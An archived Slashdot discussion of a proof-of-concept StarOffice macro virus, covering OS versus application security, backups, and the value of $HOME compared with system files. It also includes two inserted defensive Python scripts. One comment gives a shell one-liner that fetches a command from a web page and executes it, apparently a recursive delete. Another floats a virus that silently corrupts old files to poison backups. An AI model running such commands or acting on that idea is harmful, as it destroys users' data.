Slashdot Mirror


First StarOffice Virus Sighted

Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."

166 comments

  1. it's still basically a OS security issue by yagu · · Score: 3, Interesting

    First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

    Regardless, it's no secret or mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

    OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.

    Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

    1. Re:it's still basically a OS security issue by Otter · · Score: 5, Insightful
      If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

    2. Re:it's still basically a OS security issue by 99BottlesOfBeerInMyF · · Score: 2, Interesting

      Regardless, it's no secret or mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficient access to do damage, including erasing personal files and likely even connecting to the internet and sending spam or a DoS attack. Programs like this will have vulnerabilities. Right now, this is not too serious of a threat. A real piece of malware based on this would probably not even propagate anywhere, however it is a valid issue going forward, especially if market share increases.

      The solution in my mind is twofold. First, institute a VM, or Mandatory access control, or jail or whatever you want to call it for all applications. This would limit the exposure from the user directory, to just the files and network access of the application, unless the user specifically allowed the behavior. The second component is a versioned filesystem with redundancy to make sure any files it overwrote could be quickly and painlessly rolled back to the uncorrupted version. This still leaves some room for damage. A subtle malware could add text to a document that might be overlooked, and some clever social engineering could expand the attack. Still, I think both of these are logical directions for security improvements.

    3. Re:it's still basically a OS security issue by jfengel · · Score: 2, Insightful

      I think that protecting the user's own data is sufficient reason to blame this on the app writer, not the OS. Yeah, it's the OS's fault if rootkit-level harm can be done, but I think of that as a whole separate problem. Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

      There's plenty of blame to go around, but it points out a general clue: writing secure generalized systems is hard, whether it's an OS or a word processor that thinks it's an OS. Security is everybody's problem, and you have to think about it every time you get input from a user. Limiting the effect of security failure isn't the same as abnegating responsibility to prevent that failure. The more power you give that user, the more responsibility YOU have to ensure that power isn't misused.

    4. Re:it's still basically a OS security issue by anagama · · Score: 4, Insightful
      If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
      For me, the system is the least valuable area. I have system CDs and if it gets borked, I can reinstall and reconfigure. A hassle "yes", end of the world "no". What concerns me is all the irreplaceable content in my home directory. In my home dir, I have all the privileges I need to ruin it all. Now, I keep backups because I know that all computers always fail (at some point in time), but most people are pretty cavalier about backing up stuff. Of course, when I back up, I only back up my data because really, the system is stupidly easy to replace. A person who loses all their baby pics due to a malicious macro isn't really going to care that their printer config is still good.
      --
      What changed under Obama? Nothing Good
    5. Re:it's still basically a OS security issue by yagu · · Score: 1

      I wish I could add you to my friends list.

    6. Re:it's still basically a OS security issue by 99BottlesOfBeerInMyF · · Score: 1

      Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

      I fault the OS for not giving sufficient granularity of permissions for applications. The user should decide if the program gets access to sockets, and if they are real sockets or virtual ones. It should also have reasonable defaults that let the user decide if their word processor can access the internet or open another application or run arbitrary scripts. (Note, I know some OS's are starting to do this, but it needs to be built in, with good defaults and a good UI.)

      I blame the office suite if it runs macros by default and if those macros are not sufficiently restricted.

      Security is everybody's problem, and you have to think about it every time you get input from a user.

      Agreed.

      Limiting the effect of security failure isn't the same as abnegating responsibility to prevent that failure. The more power you give that user, the more responsibility YOU have to ensure that power isn't misused.

      I sort of agree with this. I think in the end the user should have the ability to do anything on their own system, but that as they do more dangerous, unusual, and malware-like things, they should be clearly and strongly warned and made to choose an option from a sufficiently granular set of functionality.

    7. Re:it's still basically a OS security issue by blibbler · · Score: 2, Interesting

      A Jail for all programs? I am no free software advocate, but that seems pretty extreme! Can't you give them a warning, or at least probation?

    8. Re:it's still basically a OS security issue by ElleyKitten · · Score: 1

      I agree. It's not like if my /home got deleted I'd be all "well, at least my frozen bubble playing is uninterrupted!"

      --
      "What is Internet Explorer 7? Are you saying we can't access the normal internet?" - I love tech support. Really.
    9. Re:it's still basically a OS security issue by Clover_Kicker · · Score: 1

      People who don't backup /home every night deserve everything they get.

    10. Re:it's still basically a OS security issue by addaon · · Score: 1

      losing $HOME is far more serious than losing system files

      It really isn't. Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely due to practical issues.

      Moreover, when $HOME gets wiped, you just have to lay your data back down -- call it ten minutes if you do a complete backup nightly to a DVD, or half an hour if you're cheap and do incrementals to CD most of the time. When / gets so much as looked at by someone else, you get to look forward to a full re-install to get the system trustworthy again -- half an hour again on top of restoring $HOME, plus re-installing any software you might have that doesn't come with your distro.

      It's not that getting / screwed with is that much more dangerous, it's admittedly no big deal if you have reasonable backups. But it's a total PITA.

      --

      I've had this sig for three days.
    11. Re:it's still basically a OS security issue by zlogic · · Score: 2, Informative

      Mandrake stores the user's backups in a read-only (for normal users) directory. So the virus can damage the user's home dir, but yesterday's (or last week's) backup will remain intact, because only root can hose it and not the user or the virus.

    12. Re:it's still basically a OS security issue by I'm+Don+Giovanni · · Score: 3, Insightful

      "People who don't backup /home every night deserve everything they get."

      But even if you did backup every night, what if some malware corrupted some documents in /home? Maybe changed some vital data in a spreadsheet? Maybe the change would be too subtle to notice, and your spreadsheet would start producing incorrect calculations due to the incorrect data, unbeknownst to you. And when you did your nightly backup, guess what, the corrupted spreadsheet gets backed up as well, so now your backup store is corrupt.

      --
      -- "I never gave these stories much credence." - HAL 9000
    13. Re:it's still basically a OS security issue by flobberchops · · Score: 1

      That's an entire 24 hours worth of porn downloading you insensitive clod!

    14. Re:it's still basically a OS security issue by Fred_A · · Score: 2, Funny

      What do you mean "uninterrupted" ? You'd have lost your high score file !!

      --

      May contain traces of nut.
      Made from the freshest electrons.
    15. Re:it's still basically a OS security issue by Solra+Bizna · · Score: 1

      This happened to me.

      -:sigma.SB

      --
      WARN
      THERE IS ANOTHER SYSTEM
    16. Re:it's still basically a OS security issue by chill · · Score: 4, Interesting

      If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

      Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

      I don't, nor do I know anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

      What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

      I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

      I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

        -Charles

      --
      Learning HOW to think is more important than learning WHAT to think.
    17. Re:it's still basically a OS security issue by Fred_A · · Score: 2, Insightful

      In the open source world, we don't jail programs, we make them do community work ;)

      --

      May contain traces of nut.
      Made from the freshest electrons.
    18. Re:it's still basically a OS security issue by phantomfive · · Score: 1

      Yeah, we have this discussion all the time, and it drives me crazy. The most important files to the user are his own, but the attacker is much more interested in the system files, to create a botnet, or an IRC server, or whatever.

      More importantly, compared to the mess that we have on windows, it can be trivial to remove spyware. A simple command can do it. For example:
      find / -user "$ME" -type f -perm /111 -exec rm -i {} \;

      So even though a virus in userland can do serious damage, it is in a more vulnerable position, and can be dealt with much more easily.

      --
      Qxe4
    19. Re:it's still basically a OS security issue by DragonWriter · · Score: 1
      I fault the OS for not giving sufficient granularity of permissions for applications.


      Appropriate "sandbox" security model depends on what an application is supposed to be doing; any application that provides a scripting facility ought to provide an appropriate internal security model as well. Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that, or unless the application itself provides no dangerous capacities in the first place.
    20. Re:it's still basically a OS security issue by Fred_A · · Score: 1
      First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?


      Sort of. There is a "security" setting in the preferences that is set to "medium" by default meaning that macros will require confirmation before they execute unless they are from a trusted source. No trusted sources are defined by default.

      Of course lots of users will agree to pretty much anything the machine asks (the website wants to steal all your money and reformat your disk before letting you download the crappy screensaver Y/N) so it may not be much of a protection.
      --

      May contain traces of nut.
      Made from the freshest electrons.
    21. Re:it's still basically a OS security issue by mrjb · · Score: 1

      > losing $HOME is far more serious than losing system files.

      I would have to disagree. It is much, much easier to (backup and) recover $HOME with the appropriate precautions than to tune an OS for optimal performance.

      On my machine, an automatic, periodic backup is made of $HOME by a cron job to my other disk (which requires root access). With only userland privileges, no virus will be able to get to that backup. Restoring a backup is as simple as a tar xvfz /path/to/backup. Capital damage: 5 minutes to restore the backup, and up to 1 day of lost work, worst case. And that's because I have this backup run made only once per day.

      Even if the virus sets your house on fire and misplaces your granny's teeth, I guess that pretty much solves the virus problem then, doesn't it?

      Now compare that to the damage that a virus that has root/admin privileges can do: hosing your entire system. I wish you good luck restoring *that* in 5 minutes.

      --
      Visit http://ringbreak.dnd.utwente.nl/~mrjb/growingbettersoftware to download your free copy of the book
    22. Re:it's still basically a OS security issue by Anonymous Coward · · Score: 0

      Yea, but the options usually aren't either $home or system files being vulnerable. The options usually are either $home or both being vulnerable.

    23. Re:it's still basically a OS security issue by PlusFiveTroll · · Score: 1

      Hence the adage, "If you don't have a backup, you don't have data."

      Flood, fire, virus, crash. Really doesn't matter, gone is gone.

      Now what's more dangerous is a virus/script that changes figures and words in documents. It's likely you'll overwrite your backups and only have corrupt information.

      Hmm, here is an idea, only have the virus corrupt data on files that have not been accessed in the last (x) days, 30 to 60 sounds like a good number, by the time most people notice it will be too late.

    24. Re:it's still basically a OS security issue by Lisandro · · Score: 1

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

      I think you're missing the point. Sure, for most users, losing $HOME is as good as losing their entire harddrive. But $HOME can be very easily backed up - some distros can even be set up to do an automatic backup for you. Or, if you're really paranoid, could even run StarOffice with its very own user. The tools to protect important files are there, you just have to use them.

      What's so good about Unix is that the user/system separation is well defined - and well enforced by both the OS and applications. In that sense, it would be almost impossible for a virus or macro to bring down your system or user files if you take basic precautions. Windows, for example, implements similar (if not better) user/system separation models, but most software fails to follow it or enforce it (creating admin accounts by default, software that won't run without admin privileges, etc).

    25. Re:it's still basically a OS security issue by Clover_Kicker · · Score: 1

      1) That's a lot of maybes. Viruses used to pull cute corruption tricks but I haven't seen that behaviour since I was scanning 5-1/4" floppies for boot sector viruses.

      2) I keep dailies for a week and monthlies essentially forever, i.e. burned to CD/DVD. Not perfect, but I wouldn't be totally hosed.

    26. Re:it's still basically a OS security issue by StonyUK · · Score: 1

      Yeah, and people who connect to the Internet deserve all they get too. Remember the good old days when you could only catch a virus off a floppy? I'd like to see those Russian crackers infect millions of PCs that way!

    27. Re:it's still basically a OS security issue by morgan_greywolf · · Score: 1

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

      That depends on what you keep in $HOME.

      Personally, I keep my data on separate partition mounted on, say, /data or something like that.

      Most of what's in my home directory is just stuff I've downloaded and my Gnome/KDE settings, etc. If I lose those, the system will just recreate them. Big deal. So I have to go in and click on a few dialogs to get them back to where they were.

    28. Re:it's still basically a OS security issue by Maljin+Jolt · · Score: 1

      Remember the good old days when you could only catch a virus off a floppy? I'd like to see those Russian crackers infect millions of PCs that way!

      All that was necessary for Russian crackers to achieve that was to release a cracked&infected latest version of Leisure Suit Larry or Space Quest to several BBS's. The rest of the millions got infected via downloaded floppies in a week or so. Game publishers did that regularly, usually at start of public anti-piracy FUD campaign, just at the point when sales of a specific title turned down.

      --
      There you are, staring at me again.
    29. Re:it's still basically a OS security issue by 99BottlesOfBeerInMyF · · Score: 1

      Appropriate "sandbox" security model depends on what an application is supposed to be doing

      Agreed, but a reasonable default should be applied to any software installed and can be modified to become less restrictive as the user tries to use it for more tasks and approves more uses for it.

      Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that

      I very much agree.

      P.S. the blockquote tag is not valid with just text in it. You need to nest a paragraph or other tag.

    30. Re:it's still basically a OS security issue by bmk67 · · Score: 1

      Try rdiff-backup.

      I use this to back up three entire systems (minus certain directories such as /tmp and /var/tmp) every night to a central volume. Only the deltas get backed up, and you have the ability to do point-in-time recovery from past backups. Periodically, I move the backup directory off to a removable drive and start fresh.

    31. Re:it's still basically a OS security issue by EvanED · · Score: 1

      Most users don't back up though. So while for people who DO, losing ~ isn't horrible, for 95+% of people out there it's the end of the world.

      I've got data so scattered around my hard drive that there's no hope of doing any sort of reasonable backup right now for instance. It's my failing, and some time when I have time I plan to go through and sort stuff out, but right now if I lose my data you might as well toss my computer off the roof.

    32. Re:it's still basically a OS security issue by ak3ldama · · Score: 1
      I used to use cron to make a nightly tarball of my FreeBSD system's home directory when I ran that as my only OS. With two hard drives the process was trivial and fairly unnoticeable. Just set up the other drive as a /backup or so. Have cron.daily do a "tar -czf /backup/nightly.tar.gz /home". The details are sketchy as this was years ago, but it worked nicely and could easily have been done weekly instead of daily.

      I did this more to be able to track a change in code in case something happened. This should have been solved by RAID and a SCM system but I was/am young and stupid.

      --
      "but money is the God of Algiers & Mahomet their prophet." - Rich. O'Bryen June 8th 1786
    33. Re:it's still basically a OS security issue by poot_rootbeer · · Score: 1

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

      Once more for this response can't hurt, either: losing one user's $HOME is far less serious than losing every home directory on the box plus the box itself maliciously attacking other parts of the network.

    34. Re:it's still basically a OS security issue by Anonymous Coward · · Score: 0

      Call me crazy, but I back up every day. I used to rely on RAID mirroring, but after having file system corruption mirrored too many times I stopped doing that. Instead, my approach is:

      1. Nightly mirroring with rdiff. This gives me a history and a delay for "undeleting" files. Granted the mirror drives live in the same file server so...

      2. Nightly archiving of critical data (mostly ~/Documents). This is tar-balled with weekly fulls and daily incrementals.

      3. Tarball to DVD. This used to be biweekly, but is now a weekly task. Everything burned to DVD is tracked in a database (which is also periodically backed up to DVD) with MD5 and/or SHA. To facilitate clearing diskspace the archives on the hard drive are checked against those on DVD and, if identical, removed. Disks are numbered on the disk and in the database.

      4. Irregular backups to DVD using the same utility, no tarballing.

      What this gives me is layers of data security with a decent scheme for finding data. The front end to the db allows file path/name querying and reports on DVD and filesystem paths. Queries can be limited to a disk or the whole set, etc., etc., or just go directly to the SQL.

      Although a little bit of work to set up, this has worked quite well for me the last couple of years. I've recovered data and have an archive of my critical files.

      So, in short, some people *do* take their data seriously enough to protect it properly.
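
Added example, not code from any poster in this thread: comments 12 and 23 worry that silently altered documents get copied into the nightly backup, and comment 34 tracks archives by MD5/SHA in a database. The Python script below combines the two ideas by comparing a hash manifest of the home directory against the previous one before an older backup generation is discarded, flagging changes to long-untouched files and changes that left the timestamp as it was; the function names, the 30-day threshold and the sample files are assumptions made for illustration.

```python
import hashlib
import os
import tempfile
import time
from pathlib import Path

DAY = 86400  # seconds


def sha256_file(path, chunk=1 << 16):
    """Hash a file in chunks so large archives do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root):
    """Return {relative path: (sha256, mtime_ns)} for regular files under root."""
    root = Path(root)
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if path.is_symlink() or not path.is_file():
                continue  # skip symlinks, sockets and devices
            manifest[path.relative_to(root).as_posix()] = (
                sha256_file(path), path.stat().st_mtime_ns)
    return manifest


def compare(old, new, now, dormant_days=30):
    """Diff two manifests and flag the changes worth reviewing before rotation."""
    cutoff_ns = int((now - dormant_days * DAY) * 1e9)
    report = {"added": sorted(set(new) - set(old)),
              "removed": sorted(set(old) - set(new)),
              "changed": [], "changed_dormant": [], "changed_same_mtime": []}
    for rel in sorted(set(old) & set(new)):
        (old_hash, old_mtime), (new_hash, new_mtime) = old[rel], new[rel]
        if old_hash == new_hash:
            continue
        report["changed"].append(rel)
        if old_mtime < cutoff_ns:
            # File had not been modified for dormant_days, yet its content differs.
            report["changed_dormant"].append(rel)
        if old_mtime == new_mtime:
            # Content differs although the modification time is identical.
            report["changed_same_mtime"].append(rel)
    return report


def safe_to_rotate(report):
    """Keep the older backup generation while any suspicious change is unreviewed."""
    return not (report["changed_dormant"] or report["changed_same_mtime"])


def demo():
    """Run the check on a constructed directory tree (sample data, not real files)."""
    now = time.time()
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        ages_in_days = {"budget.csv": 90, "photo.bin": 200,
                        "notes.txt": 1, "todo.txt": 2}
        for name, age in ages_in_days.items():
            path = root / name
            path.write_text(f"original {name}\n")
            stamp = int(now) - age * DAY
            os.utime(path, (stamp, stamp))
        before = build_manifest(root)

        (root / "notes.txt").write_text("edited today\n")      # ordinary edit
        (root / "budget.csv").write_text("figures altered\n")  # dormant file changes
        photo = root / "photo.bin"
        photo.write_text("altered\n")
        os.utime(photo, ns=(before["photo.bin"][1],) * 2)      # old timestamp restored
        (root / "todo.txt").unlink()
        (root / "new.txt").write_text("new\n")

        return compare(before, build_manifest(root), now)


if __name__ == "__main__":
    result = demo()
    for category, paths in result.items():
        print(f"{category}: {paths}")
    print("safe to rotate old backups:", safe_to_rotate(result))
```

Kept on storage the user account cannot write to, as comments 11 and 21 describe for the backups themselves, the previous manifest cannot be rewritten by a macro running as that user.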

    35. Re:it's still basically a OS security issue by Omega+Blue · · Score: 1

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

      If your entire system is compromised, you lose $HOME anyway. It's not like if you lose your system somehow $HOME escapes destruction.

    36. Re:it's still basically a OS security issue by Anonymous Coward · · Score: 0

      Every night? I don't even download that much pr0n anymore, and I definitely don't make big important stuff that often.

      I do backup my files, but only when changes have become big enough that losing them would be a real problem.

    37. Re:it's still basically a OS security issue by Clover_Kicker · · Score: 1

      It's a cron job.

      99.9% of the time the backup doesn't capture any interesting changes, but you never know.

    38. Re:it's still basically a OS security issue by Makarakalax · · Score: 1

      Your point is valid but somewhat ridiculous. I have 4 users on my linux computer, how can you say losing all of their files is better than one of them losing their files?

    39. Re:it's still basically a OS security issue by Eivind · · Score: 1

      This is stupid. To most people, $HOME is about 1000 times more valuable than the sum total of everything stored outside of $HOME. Thus wiping $HOME is equally serious (more or less) as wiping the entire system.

    40. Re:it's still basically a OS security issue by Eivind · · Score: 1
      Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely due to practical issues.

      I beg to differ. I mean, I agree one should backup. But actually, with today's users and today's machines, the large majority of the data and also the largest deltas live in $HOME.

      I've got a single 300GB disc. Perfectly average, and by no means high-end.

      The sum total of the operating-system and applications comes to perhaps 5GB. The sum total of $HOME comes to 200GB.

      Backing up home is in practice exactly as much work as backing up the entire computer.

      And no, the deltas are *not* smaller. If I delete a *single* dvd-image (say the old Mandriva.iso) from my $HOME, that's more than the sum total of deltas for the OS over the entire supported lifespan.

    41. Re:it's still basically a OS security issue by Anonymous Coward · · Score: 0

      Correction, you "stupid mother fucker."

      As you said, on a "large multi-user Unix system", wiping out ~ is a big deal for YOU. The rest of the users don't give a fuck. And that is why it's not as bad as a system-wide impact: one unfortunate (or stupid) bastard instead of 100.

  2. Missing the best part. by Anonymous Coward · · Score: 3, Funny

    What? No link to the "adult content?"

    1. Re:Missing the best part. by Anonymous Coward · · Score: 0

      Holy crap, this isn't FP? I think the /. bylaws state that Yagu has to cede first post because he didn't immediately jump on the pr0n aspect of the story.

    2. Re:Missing the best part. by slide-rule · · Score: 1

      I'd like to request that such "concept viruses" as this have "NSFW" encoded in their names... w32.ooBasic.NSFW (or something). That'd be really handy. ;-)

    3. Re:Missing the best part. by moro_666 · · Score: 1

      and why are they calling this a virus or a flaw ?

      i thought that free pr0n was a feature ...

      --

      I'd tell you the chances of this story being a dupe, but you wouldn't like it.
  3. Virus!? by Kesch · · Score: 5, Funny

    It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

    I don't call that a virus, I call it a feature.

    Hopefully the next version will allow you to enter keywords to guide the image downloader.

    --
    If this signature is witty enough, maybe somebody will like me.
    1. Re:Virus!? by Anonymous Coward · · Score: 0

      Proficient at typing with one hand, are you?

    2. Re:Virus!? by IAmTheDave · · Score: 2, Interesting
      I don't call that a virus, I call it a feature.

      Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.

      I knew it was insecure.

      --
      Excuse my speling.
      Making The Bar Project
    3. Re:Virus!? by packetmon · · Score: 1

      echo uggc://jjj.aet4h.pbz/serrofq/onol-qbyy-1.wct | rot13 | xargs firefox

    4. Re:Virus!? by Jim+Hall · · Score: 3, Funny

      What, no screenshots?

    5. Re:Virus!? by bobsledbob · · Score: 1


      I thought BSD was dying?

      --
      Beware of geeks bearing formulas.
    6. Re:Virus!? by caluml · · Score: 1

      Yeah, I bet it isn't even a virus. Someone was caught looking at porn, and they came up with the excuse:
      Look! It must be a virus. Oh yeah, Star Office. They don't have viruses, you say? Well, it must be the first one ever.

  4. virus? by gEvil+(beta) · · Score: 5, Funny

    It downloads an image file with adult content from the Internet and opens that file in a new document

    That's no virus, that's a productivity tool!

    --
    This guy's the limit!
    1. Re:virus? by Anonymous Coward · · Score: 0

      A re-productivity tool!

  5. Auto Pron Download by 93,000 · · Score: 0, Redundant

    . . . It downloads an image file with adult content from the Internet and opens that file in a new document . . .

    Automatically? Shouldn't this be considered a feature rather than a virus?

  6. A Virus by CastrTroy · · Score: 3, Insightful

    Is this really a virus? It downloads and displays an image with adult content, and displays it. It doesn't run any malicious code, doesn't touch your file system, and doesn't leave any trace after it has run. Sure, you may get in trouble at work, if it downloads the single image, but I think that most IT departments would understand, and wouldn't be able to do much for you for downloading a single image with adult content.

    --

    Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
    1. Re:A Virus by Golias · · Score: 3, Insightful

      A "Proof of concept" malware example for a non-Microsoft product, such as StarOffice or OS X, is demonstrated in a controlled lab: Big news!

      An actual virus which utterly cripples Windows PCs is discovered in the wild: Business as usual.

      That's pretty much all you need to know about Windows and MS-Office.

      --

      Information wants to be anthropomorphized.

    2. Re:A Virus by soundoff · · Score: 1, Insightful

      As said in TFA, this virus is merely a proof of concept. Using the most simplistic expansion of the idea, imagine if it did this, say, every time you ran StarOffice. Fifty times. Every minute. On a slightly less simplistic expansion, imagine if it downloaded something other than an image. A trojan, perhaps. Another virus that it saved instead of your currently-open document mydocument.doc.exe.

    3. Re:A Virus by Whiney+Mac+Fanboy · · Score: 1

      Yes, it shows all the characteristics of a virus - it attaches itself to something & self propagates. It's not a particularly malicious or effective Virus, but it's most certainly a virus.

      --
      There are shills on slashdot. Apparently, I'm one of them.
    4. Re:A Virus by packetmon · · Score: 2, Interesting

      What do you think would happen if someone scripted something into it... Remember it's a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

      lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec

    5. Re:A Virus by mark-t · · Score: 1

      I saw nothing in the article that indicated anything about it being able to propagate.

    6. Re:A Virus by drpimp · · Score: 1

      It's a PoC (proof of concept), they could have just as well made an alert box popup with the wording "pwned". But even still, what they made this PoC do, it is simply arbitrary code, and anything else could be put in place to actually conduct a malicious attack. "Virus" should not be in this title, exploit would be more apropos. Not to mention, unless you run StarOffice as root, only whatever user you are using this app will have this permissions to do its dirty deeds.

      --
      -- Brought to you by Carl's JR
    7. Re:A Virus by heinousjay · · Score: 1

      Yeah, I'd be happy to only lose my home, as long as my precious /bin directory wasn't erased. I can easily replicate all my work, but I'd never be able to reinstall my software.

      --
      Slashdot - where whining about luck is the new way to make the world you want.
    8. Re:A Virus by Whiney+Mac+Fanboy · · Score: 1
      Not in the linked slashdot article, I read this from PC World this morning:
      Typically, a virus using macros infects a template, which is then read when opening other documents and infects those also, Schouwenberg said. The Stardust virus is contained in a StarOffice document that uses macros and then infects a global template.

      If a user opens a document infected with Stardust, every StarOffice text document, with a ".sxw" extension, or document template, with a ".stw" extension, will be infected, Schouwenberg said.
      Global Template! Typical MO for an old skool macro virus.... (if true).

      That said - it is a pretty ineffective virus - it has to ask the user if it's allowed to execute the basic macro & then *still* only has access to user files.
      --
      There are shills on slashdot. Apparently, I'm one of them.
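
Added example (not part of the comment above, and not StarOffice or Kaspersky code): a defender-side check that lists which .sxw/.stw documents in a directory carry embedded Basic modules, the file types the quoted PC World text says get infected. It assumes these files are ZIP packages that keep Star Basic libraries under `Basic/`, with `script-lc.xml`/`script-lb.xml` as index files; every sample document is constructed in memory.

```python
import io
import tempfile
import zipfile
from pathlib import Path

DOC_EXTENSIONS = {".sxw", ".stw"}   # extensions named in the quoted PC World text
MACRO_PREFIX = "Basic/"             # assumption: package directory holding Star Basic libraries


def macro_modules(data):
    """Return sorted paths of Basic modules embedded in one document package."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as pkg:
            names = pkg.namelist()
    except zipfile.BadZipFile as exc:
        raise ValueError("not a ZIP-based document package") from exc
    modules = []
    for name in names:
        leaf = name.rsplit("/", 1)[-1]
        # Assumed index files (script-lc.xml, script-lb.xml) can exist for an
        # empty library, so they do not count as macro code by themselves.
        if (name.startswith(MACRO_PREFIX) and leaf.endswith(".xml")
                and not leaf.startswith("script-")):
            modules.append(name)
    return sorted(modules)


def scan_tree(root):
    """Map each .sxw/.stw under root to its module list, or None if unreadable."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in DOC_EXTENSIONS:
            try:
                report[path.name] = macro_modules(path.read_bytes())
            except ValueError:
                report[path.name] = None  # damaged or mislabelled: review by hand
    return report


def build_package(entries):
    """Build a constructed stand-in for a document package (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("content.xml", "<office:document-content/>")
        for name in entries:
            pkg.writestr(name, "<placeholder/>")
    return buf.getvalue()


def demo():
    """Scan a temporary directory of constructed samples and return the report."""
    index = ["Basic/script-lc.xml", "Basic/Standard/script-lb.xml"]
    samples = {
        "clean.sxw": build_package([]),
        "empty-library.sxw": build_package(index),
        "with-macro.sxw": build_package(index + ["Basic/Standard/Module1.xml"]),
        "template.stw": build_package(["Basic/Standard/Module1.xml"]),
        "truncated.sxw": b"PK\x03\x04 not really a zip",
        "notes.txt": b"ignored: wrong extension",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            Path(tmp, name).write_bytes(data)
        return scan_tree(tmp)


if __name__ == "__main__":
    for doc, modules in demo().items():
        print(doc, "UNREADABLE" if modules is None else (modules or "no macros"))
```

A document that lists modules is not necessarily malicious; the report only narrows down which files deserve a look before they are opened with macros enabled.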
    9. Re:A Virus by mark-t · · Score: 1
      rm -rf / (which based on the contents of the url you referred to above, I assume is the command you would be invoking with the one-line script) would have no serious effects on a Unix system unless you were running as root. It would have the annoying consequence of removing every file on the system that is owned by the current user, but in all honesty, the responsibility of backing up one's own documents is a small enough scope project that there's no reason people shouldn't be doing that regularly. Unfortunately, most people (myself included, I must ashamedly admit) have to experience one or two critical system failures and lose weeks or months worth of work at a time before they get a clue that this simple precautionary measure pays for its effort a thousand-fold when it's needed.

      As for running as root, there is rarely any need to run as root on a Unix system. Software that genuinely requires root privileges to operate can be run through sudo, and the number of applications that is the case for is extremely tiny. In any event, StarOffice is not one of them.

    10. Re:A Virus by Fred_A · · Score: 1

      .sxw ? So OpenDocument files are immune ?

      --

      May contain traces of nut.
      Made from the freshest electrons.
    11. Re:A Virus by Whiney+Mac+Fanboy · · Score: 1

      OO2 users are not affected (apparently)

      --
      There are shills on slashdot. Apparently, I'm one of them.
    12. Re:A Virus by Anonymous Coward · · Score: 0

      Old skool macro virus?

